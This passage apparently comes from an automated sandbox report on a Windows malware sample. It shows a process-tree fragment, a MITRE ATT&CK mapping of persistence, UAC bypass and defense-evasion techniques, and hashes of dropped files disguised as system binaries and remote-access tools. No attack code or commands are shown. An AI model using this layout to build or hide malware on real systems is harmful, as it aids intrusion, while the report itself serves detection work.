                                                                                                                                                                                                                                                                                                                                                • Suspicious behavior: GetForegroundWindowSpam
                                                                                                                                                                                                                                                                                                                                                • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                                                                                                                                                                • Suspicious use of FindShellTrayWindow
                                                                                                                                                                                                                                                                                                                                                • Suspicious use of SendNotifyMessage
                                                                                                                                                                                                                                                                                                                                                PID:2700
                                                                                                                                                                                                                                                                                                                                              • C:\Windows\explorer.exe
                                                                                                                                                                                                                                                                                                                                                "C:\Windows\explorer.exe"
                                                                                                                                                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                                                                                                                                                  PID:324
                                                                                                                                                                                                                                                                                                                                                • C:\Windows\system32\AUDIODG.EXE
                                                                                                                                                                                                                                                                                                                                                  C:\Windows\system32\AUDIODG.EXE 0x588
                                                                                                                                                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                                                                                                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                                                                                                                                                                  PID:2228

                                                                                                                                                                                                                                                                                                                                                Network

                                                                                                                                                                                                                                                                                                                                                MITRE ATT&CK Matrix ATT&CK v13

                                                                                                                                                                                                                                                                                                                                                Execution

                                                                                                                                                                                                                                                                                                                                                Scheduled Task/Job

                                                                                                                                                                                                                                                                                                                                                1
                                                                                                                                                                                                                                                                                                                                                T1053

                                                                                                                                                                                                                                                                                                                                                Command and Scripting Interpreter

                                                                                                                                                                                                                                                                                                                                                1
                                                                                                                                                                                                                                                                                                                                                T1059

                                                                                                                                                                                                                                                                                                                                                Persistence

                                                                                                                                                                                                                                                                                                                                                Create or Modify System Process

                                                                                                                                                                                                                                                                                                                                                3
                                                                                                                                                                                                                                                                                                                                                T1543

                                                                                                                                                                                                                                                                                                                                                Windows Service

                                                                                                                                                                                                                                                                                                                                                3
                                                                                                                                                                                                                                                                                                                                                T1543.003

                                                                                                                                                                                                                                                                                                                                                Account Manipulation

                                                                                                                                                                                                                                                                                                                                                1
                                                                                                                                                                                                                                                                                                                                                T1098

                                                                                                                                                                                                                                                                                                                                                Boot or Logon Autostart Execution

                                                                                                                                                                                                                                                                                                                                                3
                                                                                                                                                                                                                                                                                                                                                T1547

                                                                                                                                                                                                                                                                                                                                                Registry Run Keys / Startup Folder

                                                                                                                                                                                                                                                                                                                                                2
                                                                                                                                                                                                                                                                                                                                                T1547.001

                                                                                                                                                                                                                                                                                                                                                Winlogon Helper DLL

                                                                                                                                                                                                                                                                                                                                                1
                                                                                                                                                                                                                                                                                                                                                T1547.004

                                                                                                                                                                                                                                                                                                                                                Scheduled Task/Job

                                                                                                                                                                                                                                                                                                                                                1
                                                                                                                                                                                                                                                                                                                                                T1053

                                                                                                                                                                                                                                                                                                                                                Privilege Escalation

                                                                                                                                                                                                                                                                                                                                                Create or Modify System Process

                                                                                                                                                                                                                                                                                                                                                3
                                                                                                                                                                                                                                                                                                                                                T1543

                                                                                                                                                                                                                                                                                                                                                Windows Service

                                                                                                                                                                                                                                                                                                                                                3
                                                                                                                                                                                                                                                                                                                                                T1543.003

                                                                                                                                                                                                                                                                                                                                                Abuse Elevation Control Mechanism

                                                                                                                                                                                                                                                                                                                                                1
                                                                                                                                                                                                                                                                                                                                                T1548

                                                                                                                                                                                                                                                                                                                                                Bypass User Account Control

                                                                                                                                                                                                                                                                                                                                                1
                                                                                                                                                                                                                                                                                                                                                T1548.002

                                                                                                                                                                                                                                                                                                                                                Boot or Logon Autostart Execution

                                                                                                                                                                                                                                                                                                                                                3
                                                                                                                                                                                                                                                                                                                                                T1547

                                                                                                                                                                                                                                                                                                                                                Registry Run Keys / Startup Folder

                                                                                                                                                                                                                                                                                                                                                2
                                                                                                                                                                                                                                                                                                                                                T1547.001

                                                                                                                                                                                                                                                                                                                                                Winlogon Helper DLL

                                                                                                                                                                                                                                                                                                                                                1
                                                                                                                                                                                                                                                                                                                                                T1547.004

                                                                                                                                                                                                                                                                                                                                                Scheduled Task/Job

                                                                                                                                                                                                                                                                                                                                                1
                                                                                                                                                                                                                                                                                                                                                T1053

                                                                                                                                                                                                                                                                                                                                                Defense Evasion

                                                                                                                                                                                                                                                                                                                                                Modify Registry

                                                                                                                                                                                                                                                                                                                                                9
                                                                                                                                                                                                                                                                                                                                                T1112

                                                                                                                                                                                                                                                                                                                                                Impair Defenses

                                                                                                                                                                                                                                                                                                                                                5
                                                                                                                                                                                                                                                                                                                                                T1562

                                                                                                                                                                                                                                                                                                                                                Disable or Modify Tools

                                                                                                                                                                                                                                                                                                                                                3
                                                                                                                                                                                                                                                                                                                                                T1562.001

                                                                                                                                                                                                                                                                                                                                                Disable or Modify System Firewall

                                                                                                                                                                                                                                                                                                                                                1
                                                                                                                                                                                                                                                                                                                                                T1562.004

                                                                                                                                                                                                                                                                                                                                                Hide Artifacts

                                                                                                                                                                                                                                                                                                                                                3
                                                                                                                                                                                                                                                                                                                                                T1564

                                                                                                                                                                                                                                                                                                                                                Hidden Files and Directories

                                                                                                                                                                                                                                                                                                                                                3
                                                                                                                                                                                                                                                                                                                                                T1564.001

                                                                                                                                                                                                                                                                                                                                                Abuse Elevation Control Mechanism

                                                                                                                                                                                                                                                                                                                                                1
                                                                                                                                                                                                                                                                                                                                                T1548

                                                                                                                                                                                                                                                                                                                                                Bypass User Account Control

                                                                                                                                                                                                                                                                                                                                                1
                                                                                                                                                                                                                                                                                                                                                T1548.002

                                                                                                                                                                                                                                                                                                                                                File and Directory Permissions Modification

                                                                                                                                                                                                                                                                                                                                                1
                                                                                                                                                                                                                                                                                                                                                T1222

                                                                                                                                                                                                                                                                                                                                                Subvert Trust Controls

                                                                                                                                                                                                                                                                                                                                                1
                                                                                                                                                                                                                                                                                                                                                T1553

                                                                                                                                                                                                                                                                                                                                                Install Root Certificate

                                                                                                                                                                                                                                                                                                                                                1
                                                                                                                                                                                                                                                                                                                                                T1553.004

                                                                                                                                                                                                                                                                                                                                                Discovery

                                                                                                                                                                                                                                                                                                                                                System Information Discovery

                                                                                                                                                                                                                                                                                                                                                4
                                                                                                                                                                                                                                                                                                                                                T1082

                                                                                                                                                                                                                                                                                                                                                Query Registry

                                                                                                                                                                                                                                                                                                                                                1
                                                                                                                                                                                                                                                                                                                                                T1012

                                                                                                                                                                                                                                                                                                                                                Command and Control

                                                                                                                                                                                                                                                                                                                                                Web Service

                                                                                                                                                                                                                                                                                                                                                1
                                                                                                                                                                                                                                                                                                                                                T1102

                                                                                                                                                                                                                                                                                                                                                Impact

                                                                                                                                                                                                                                                                                                                                                Service Stop

                                                                                                                                                                                                                                                                                                                                                1
                                                                                                                                                                                                                                                                                                                                                T1489

                                                                                                                                                                                                                                                                                                                                                Replay Monitor

                                                                                                                                                                                                                                                                                                                                                Loading Replay Monitor...

                                                                                                                                                                                                                                                                                                                                                Downloads

                                                                                                                                                                                                                                                                                                                                                • C:\Program Files\Common Files\System\iediagcmd.exe
                                                                                                                                                                                                                                                                                                                                                  MD5

                                                                                                                                                                                                                                                                                                                                                  d41d8cd98f00b204e9800998ecf8427e

                                                                                                                                                                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                                                                                                                                                                  da39a3ee5e6b4b0d3255bfef95601890afd80709

                                                                                                                                                                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                                                                                                                                                                  e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

                                                                                                                                                                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                                                                                                                                                                  cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

                                                                                                                                                                                                                                                                                                                                                • C:\ProgramData\Microsoft\Intel\P.exe
                                                                                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                                                                                  181KB

                                                                                                                                                                                                                                                                                                                                                  MD5

                                                                                                                                                                                                                                                                                                                                                  465e715384ad2cfdaf9e2ea2b18be30f

                                                                                                                                                                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                                                                                                                                                                  b8412cc07d3878dce48eba4f4722a52c963b1284

                                                                                                                                                                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                                                                                                                                                                  bde65ad4f312f8036c70ed681e7f8c64bdd98e4cd0f8ee5c5f6b0029a45b9ccd

                                                                                                                                                                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                                                                                                                                                                  e863cd5b1c865a67317fb61a3f78d5b693ff7a28317adf81e292f9502c4e4c1ff681b830d54cf039c23235a98a0f988d252c7ce94ea6b4e6fee837c40183e3f1

                                                                                                                                                                                                                                                                                                                                                • C:\ProgramData\Microsoft\Intel\R8.exe
                                                                                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                                                                                  80KB

                                                                                                                                                                                                                                                                                                                                                  MD5

                                                                                                                                                                                                                                                                                                                                                  ddf538cdaf76d87bfd67f5ca191e6ff9

                                                                                                                                                                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                                                                                                                                                                  7236c84b78de956257ec0f69eef95b29058a6a8a

                                                                                                                                                                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                                                                                                                                                                  b5abcc80c9e43db250e150f656892a81892fd16ff320a0ff45ee5fc0936e1c4a

                                                                                                                                                                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                                                                                                                                                                  fe08925d69fdc1c9b3a74fdb104e7d43d7b84c6360282e76469b7ae776654b4f98057d06842dee005cf84d4dac1a0548950fe0581081dabd1193eaf516245c73

                                                                                                                                                                                                                                                                                                                                                • C:\ProgramData\Microsoft\Intel\taskhost.exe
                                                                                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                                                                                  1.8MB

                                                                                                                                                                                                                                                                                                                                                  MD5

                                                                                                                                                                                                                                                                                                                                                  f8a01290a5584b05cd1178b9d3ffa039

                                                                                                                                                                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                                                                                                                                                                  2aa637c2775fc83636cd7a98377e3ed7eb266867

                                                                                                                                                                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                                                                                                                                                                  3de1b87dfe3df592d8fa731032e78d14f7165f2a24121b8272e5cbad90063889

                                                                                                                                                                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                                                                                                                                                                  e3048d9d334dce3a60cdc9db748472a095b0c362c0166dd5c4b47cbd03a86e1af5c8a5ac837ef7dcc2802bfe3ce28eedf45ee0775d97288aa3692e6b2c82b4d2

                                                                                                                                                                                                                                                                                                                                                • C:\ProgramData\Microsoft\Intel\taskhost.exe
                                                                                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                                                                                  1KB

                                                                                                                                                                                                                                                                                                                                                  MD5

                                                                                                                                                                                                                                                                                                                                                  610930cc000ae653462c291b282afbf3

                                                                                                                                                                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                                                                                                                                                                  a6d358fec795cfe41cb7173f12d46c6ad6abcb83

                                                                                                                                                                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                                                                                                                                                                  24c628dacf6a171f2dc38fe0314064766354e324f4bbc666e434375a13f441ef

                                                                                                                                                                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                                                                                                                                                                  6d934ea2c2f0a5a970845e19045de82f694bfc8a031c480f76074da03eb5946aecfb8f2c3b34c6494974cf78af33c0ca28759c4ad304eeb510034d46195b76b4

                                                                                                                                                                                                                                                                                                                                                • C:\ProgramData\Microsoft\Intel\taskhost.exe
                                                                                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                                                                                  83KB

                                                                                                                                                                                                                                                                                                                                                  MD5

                                                                                                                                                                                                                                                                                                                                                  2d09170fca1a67e3d990431f3cf346a4

                                                                                                                                                                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                                                                                                                                                                  389ac97815abd0ffa1b947fbf1601b312dd3f5f5

                                                                                                                                                                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                                                                                                                                                                  977fd1e85dc2b32c0b4fc098be55091ba48c7566ca113838f94cabe80afb9f8c

                                                                                                                                                                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                                                                                                                                                                  a3284ddbb85742db654775b56d55dd64e7718b7988591d30e3a0634b95300c205b63ee8859030f7302a8536ac739bbdfb8b7c30899915007f84b519c92a9b023

                                                                                                                                                                                                                                                                                                                                                • C:\ProgramData\Microsoft\Intel\wini.exe
                                                                                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                                                                                  1.8MB

                                                                                                                                                                                                                                                                                                                                                  MD5

                                                                                                                                                                                                                                                                                                                                                  12ee2d897ccc3a44f03f12d469c6f44f

                                                                                                                                                                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                                                                                                                                                                  fa3337038a4f339121a2ec754d614e405f922286

                                                                                                                                                                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                                                                                                                                                                  19280d3873caa28787226b06571f3fcbc7bdafff470202a96adfe62a5146a833

                                                                                                                                                                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                                                                                                                                                                  4f3f7df5b33b0569e8408a56be71f737deb6c0d7c69b0f56c6987182d4b957570cbdb3d70291ccd5768435b8656559a6cd7feb32bf826b848914961a2ed1a216

                                                                                                                                                                                                                                                                                                                                                • C:\ProgramData\Microsoft\Intel\wini.exe
                                                                                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                                                                                  693KB

                                                                                                                                                                                                                                                                                                                                                  MD5

                                                                                                                                                                                                                                                                                                                                                  5fba70516f9bad460d8aa4f62ddc4abe

                                                                                                                                                                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                                                                                                                                                                  886836adfa399f6d0280a4d9e07a24aee7af7e70

                                                                                                                                                                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                                                                                                                                                                  72062bd8b0b02160b7b4cb14676a72f25f9a2d90a10d1d7308b7a5e25ec785de

                                                                                                                                                                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                                                                                                                                                                  ce40174722d28bc208332a4ace23d8062a85ca44e9dba37cfe2eea85aa9ea47475806b01a7033f67816dc1587d7ba6995a2a61ec66b6fd0d090fea78ca3720ed

                                                                                                                                                                                                                                                                                                                                                • C:\ProgramData\Microsoft\Intel\wini.exe
                                                                                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                                                                                  340KB

                                                                                                                                                                                                                                                                                                                                                  MD5

                                                                                                                                                                                                                                                                                                                                                  1759accc45a42ddbca4b1ec44b4ea033

                                                                                                                                                                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                                                                                                                                                                  3c520f67bcf74ee309b17d55355a3c386ace2024

                                                                                                                                                                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                                                                                                                                                                  bba3b10efadf7bab6c940b66e0833a3c935b6fc0ab68d1264a696ba7407e339b

                                                                                                                                                                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                                                                                                                                                                  eec772c256e9237f3b6f62a641801375d20454ac70a6bccce7745b8c559683c460604ce92284e7b653111532ca01e394e19e773436a6b5a54bd813f00aefc46b

                                                                                                                                                                                                                                                                                                                                                • C:\ProgramData\Microsoft\Intel\winlog.exe
                                                                                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                                                                                  14KB

                                                                                                                                                                                                                                                                                                                                                  MD5

                                                                                                                                                                                                                                                                                                                                                  38bb5b4e9535a1e4c92891ea269f80ba

                                                                                                                                                                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                                                                                                                                                                  1ca6f8dc1e7161a17599220adc1ca58da48b5444

                                                                                                                                                                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                                                                                                                                                                  b081cb3ad3575391d04567b190a0b2e7fc01af2596e79c8a575fa70eada715c9

                                                                                                                                                                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                                                                                                                                                                  4fb1169fe1eac3fd2425b815030a804f1ef76a079b6219e0f96b8f3297e82892168351d186f0e2ac35cb04347ddeac94f025b6dc950788ae5240a0f0dd394121

                                                                                                                                                                                                                                                                                                                                                • C:\ProgramData\Microsoft\Intel\winlog.exe
                                                                                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                                                                                  64KB

                                                                                                                                                                                                                                                                                                                                                  MD5

                                                                                                                                                                                                                                                                                                                                                  36ad94f93f40913af0ae5ceb8e650073

                                                                                                                                                                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                                                                                                                                                                  94b1f9ca44cf5a977b512a924854db8bebfbe7cc

                                                                                                                                                                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                                                                                                                                                                  055328e87ec76d561b2e8bf2f5245e98d7edc7f2f81e9bb315c93bd2b855d5fb

                                                                                                                                                                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                                                                                                                                                                  8ce4f25662152610b51278abd4d2f1495aa782916145cc5243c291cc1f4bab61a7f7d1c3bace49cc617c80491b11504eb7ec6c7f7a30d33ea2849ea664cfc70c

                                                                                                                                                                                                                                                                                                                                                • C:\ProgramData\Microsoft\Intel\winlogon.exe
                                                                                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                                                                                  35KB

                                                                                                                                                                                                                                                                                                                                                  MD5

                                                                                                                                                                                                                                                                                                                                                  2f6a1bffbff81e7c69d8aa7392175a72

                                                                                                                                                                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                                                                                                                                                                  94ac919d2a20aa16156b66ed1c266941696077da

                                                                                                                                                                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                                                                                                                                                                  dc6d63798444d1f614d4a1ff8784ad63b557f4d937d90a3ad9973c51367079de

                                                                                                                                                                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                                                                                                                                                                  ff09ef0e7a843b35d75487ad87d9a9d99fc943c0966a36583faa331eb0a243c352430577bc0662149a969dbcaa22e2b343bed1075b14451c4e9e0fe8fa911a37

                                                                                                                                                                                                                                                                                                                                                • C:\ProgramData\WindowsTask\winlogon.exe
                                                                                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                                                                                  31KB

                                                                                                                                                                                                                                                                                                                                                  MD5

                                                                                                                                                                                                                                                                                                                                                  f7c0f33566e58be4b1a6401b32245b96

                                                                                                                                                                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                                                                                                                                                                  2ffaec7bb2d77fd130c652a2c243b6819be8dd6e

                                                                                                                                                                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                                                                                                                                                                  b0f8f4327ef1781202d4ffe10797b96a38842fe06f0f736b5381f6ad19f97451

                                                                                                                                                                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                                                                                                                                                                  57346306cd0faa7513d20cd20610e19c1a74c0bf85d218a8022e95a2ee3e6d6aef4ea9fe21d12c8fb1b50189eb966fe2156723754a35184eac56f90e14fa68b8

                                                                                                                                                                                                                                                                                                                                                • C:\ProgramData\Windows\install.vbs
                                                                                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                                                                                  140B

                                                                                                                                                                                                                                                                                                                                                  MD5

                                                                                                                                                                                                                                                                                                                                                  5e36713ab310d29f2bdd1c93f2f0cad2

                                                                                                                                                                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                                                                                                                                                                  7e768cca6bce132e4e9132e8a00a1786e6351178

                                                                                                                                                                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                                                                                                                                                                  cd8df8b0c43c36aabb0a960e4444b000a04eb513f0b34e12dbfd098944e40931

                                                                                                                                                                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                                                                                                                                                                  8e5cf90470163143aee75b593e52fcc39e6477cd69a522ee77fa2589ea22b8a3a1c23614d3a677c8017fba0bf4b320a4e47c56a9a7f176dbf51db88d9d8e52c1

                                                                                                                                                                                                                                                                                                                                                • C:\ProgramData\Windows\reg1.reg
                                                                                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                                                                                  12KB

                                                                                                                                                                                                                                                                                                                                                  MD5

                                                                                                                                                                                                                                                                                                                                                  806734f8bff06b21e470515e314cfa0d

                                                                                                                                                                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                                                                                                                                                                  d4ef2552f6e04620f7f3d05f156c64888c9c97ee

                                                                                                                                                                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                                                                                                                                                                  7ae7e4c0155f559f3c31be25d9e129672a88b445af5847746fe0a9aab3e79544

                                                                                                                                                                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                                                                                                                                                                  007a79f0023a792057b81483f7428956ab99896dd1c8053cac299de5834ac25da2f6f77b63f6c7d46c51ed7a91b8eccb1c082043028326bfa0bfcb47f2b0d207

                                                                                                                                                                                                                                                                                                                                                • C:\ProgramData\Windows\reg2.reg
                                                                                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                                                                                  1KB

                                                                                                                                                                                                                                                                                                                                                  MD5

                                                                                                                                                                                                                                                                                                                                                  6a5d2192b8ad9e96a2736c8b0bdbd06e

                                                                                                                                                                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                                                                                                                                                                  235a78495192fc33f13af3710d0fe44e86a771c9

                                                                                                                                                                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                                                                                                                                                                  4ae04a85412ec3daa0fb33f21ed4eb3c4864c3668b95712be9ec36ef7658422a

                                                                                                                                                                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                                                                                                                                                                  411204a0a1cdbe610830fb0be09fd86c579bb5cccf46e2e74d075a5693fe7924e1e2ba121aa824af66c7521fcc452088b2301321d9d7eb163bee322f2f58640d

                                                                                                                                                                                                                                                                                                                                                • C:\ProgramData\Windows\rfusclient.exe
                                                                                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                                                                                  1.4MB

                                                                                                                                                                                                                                                                                                                                                  MD5

                                                                                                                                                                                                                                                                                                                                                  40db07dad66d330ae841638fbbc496bd

                                                                                                                                                                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                                                                                                                                                                  664f1d02fc1de54592c076ed729e60ebb629554f

                                                                                                                                                                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                                                                                                                                                                  1c28b6b0e84d026940e5834945c51cb0ad16307715f0865e1c3d11d6ab19654b

                                                                                                                                                                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                                                                                                                                                                  a116f0ad2686e26367005665048b5d6f11c3406c8c50d94adae6639e1c14f38071a72c082dd66cac9a1a249de72bc5c5178f09d0f4a9ae2675b3762f11eb86ae

                                                                                                                                                                                                                                                                                                                                                • C:\ProgramData\Windows\rfusclient.exe
                                                                                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                                                                                  152KB

                                                                                                                                                                                                                                                                                                                                                  MD5

                                                                                                                                                                                                                                                                                                                                                  d3cb7b6ceffaa08e5e015d289056f479

                                                                                                                                                                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                                                                                                                                                                  c7b04e81ddc054b3e6a665da43ed092f64de8486

                                                                                                                                                                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                                                                                                                                                                  358fe8b4aa0a086d325d1296b2b2196bd0a0b2317e4b56f8343fb6f29f68679b

                                                                                                                                                                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                                                                                                                                                                  cd3432d894dccf0f054f2cf26ecde05c2d3a3b29098315bc966c3e3708dfb7d99392ef0a5ad472a739e9a512ae4502f37a713cc014489b4d4a609e997155d2a7

                                                                                                                                                                                                                                                                                                                                                • C:\ProgramData\Windows\rfusclient.exe
                                                                                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                                                                                  93KB

                                                                                                                                                                                                                                                                                                                                                  MD5

                                                                                                                                                                                                                                                                                                                                                  42ca85f614989abb21a22df78496a57f

                                                                                                                                                                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                                                                                                                                                                  a570727458ec248f1cb8dbff8af46b67722dc12f

                                                                                                                                                                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                                                                                                                                                                  3af503daaba5242862bc689b4863efc9e0c6b7cfeb6066b3e2319eaf6781059d

                                                                                                                                                                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                                                                                                                                                                  55204ad362bf7a00f42ada192ac71a3e70d0e385cce1e1058da40453f0dcdf06b08b68eb6705000a16e136764da5dfbd4ec1234dd9f99ddd7c4bf44d0ad09eb8

                                                                                                                                                                                                                                                                                                                                                • C:\ProgramData\Windows\rfusclient.exe
                                                                                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                                                                                  5KB

                                                                                                                                                                                                                                                                                                                                                  MD5

                                                                                                                                                                                                                                                                                                                                                  0d0781fc9e781fb9aa92a8e20fde4542

                                                                                                                                                                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                                                                                                                                                                  56e651f3a4aa93be2198967065a2c0f4f30132a3

                                                                                                                                                                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                                                                                                                                                                  930847987b497a09be093a5a6921687f8dac19f7745b4a0c1203ce521c997947

                                                                                                                                                                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                                                                                                                                                                  aacc30c67479a9b5750bdb28af2b175d7095ca61bd8921b771cb163e48708f1c4f6b7277e8f38e70c4e47c960d87ad2bed39492820fa629e3235ab1997c5f661

                                                                                                                                                                                                                                                                                                                                                • C:\ProgramData\Windows\rutserv.exe
                                                                                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                                                                                  1.6MB

                                                                                                                                                                                                                                                                                                                                                  MD5

                                                                                                                                                                                                                                                                                                                                                  8c26efc5e27aabd9bb158025a5383b06

                                                                                                                                                                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                                                                                                                                                                  bde868c64a47b7117fe2ac94aaf9f1e41af9b42d

                                                                                                                                                                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                                                                                                                                                                  166b691c801a1315a31c4ae1e440f000234e2decf12de49fc66c823f06bbfc5e

                                                                                                                                                                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                                                                                                                                                                  7391cd1ea81f2c6a2250e3cff8a1004824af52578c9cbacf8fef64b2a1e45405927112469c62db9a9d42f5928a7592a499c143e50c94a817ac5208213918dd4d

                                                                                                                                                                                                                                                                                                                                                • C:\ProgramData\Windows\rutserv.exe
                                                                                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                                                                                  106KB

                                                                                                                                                                                                                                                                                                                                                  MD5

                                                                                                                                                                                                                                                                                                                                                  248f4558bf4c50b30d232ef3ee6bf31f

                                                                                                                                                                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                                                                                                                                                                  17baa9b4fefa6d4cc14ed2f354fd5302e82ec779

                                                                                                                                                                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                                                                                                                                                                  270ad7d2210cdf326ca40480c65e6da019156b4c749734fb6558ed29440bebf1

                                                                                                                                                                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                                                                                                                                                                  21959bfb97fd8f3ed4e6fea716e16d9d95071c760763b0fa266cff07d28c0de6574927bed995e3cc16a1dae6eecdc161cf69bffcd75fbc6de1f4c224471580bc

                                                                                                                                                                                                                                                                                                                                                • C:\ProgramData\Windows\rutserv.exe
                                                                                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                                                                                  878KB

                                                                                                                                                                                                                                                                                                                                                  MD5

                                                                                                                                                                                                                                                                                                                                                  4143e94c0e48f224c26b4b5e907b7587

                                                                                                                                                                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                                                                                                                                                                  086d6b3b9237f01234ce009cfee16ac12b323b5c

                                                                                                                                                                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                                                                                                                                                                  0f1f9eaf0f42a00571c0a137cd2f1fdaa759371b638d5ca228ce02cc94af9da2

                                                                                                                                                                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                                                                                                                                                                  3aae490418f05c155e6473722b57a584b94dfed651e38a088ee689b2f2005b476e852a6518cb86f631f2b20d6a0a6f44111e91eeb78e06fe83027b7658c7c85d

                                                                                                                                                                                                                                                                                                                                                • C:\ProgramData\Windows\rutserv.exe
                                                                                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                                                                                  514KB

                                                                                                                                                                                                                                                                                                                                                  MD5

                                                                                                                                                                                                                                                                                                                                                  b641c30f1c7e75c030d0600e6d2c9dca

                                                                                                                                                                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                                                                                                                                                                  208f9faeda38c80ffe8b3bb9e652df1eaed3f6a2

                                                                                                                                                                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                                                                                                                                                                  ddbf9644ed1f0f76b529f1a171f0e04298b64563d7fc13f83dc6a6ed56c4fa5e

                                                                                                                                                                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                                                                                                                                                                  c6f207cd6bf16580dbe495de7e1a719824fb05fe4132a413b50f96634d9b1494d292cf75e67c87aea223264ea452b23f62c5a8ccd7571e5a6b32ee919584ff45

                                                                                                                                                                                                                                                                                                                                                • C:\ProgramData\Windows\rutserv.exe
                                                                                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                                                                                  115KB

                                                                                                                                                                                                                                                                                                                                                  MD5

                                                                                                                                                                                                                                                                                                                                                  566bf936ec65b6d8fdc66e2b38fa7254

                                                                                                                                                                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                                                                                                                                                                  90b68dfd26892ca1187c76bbd8720bc3007735ed

                                                                                                                                                                                                                                                                                                                                                  SHA256

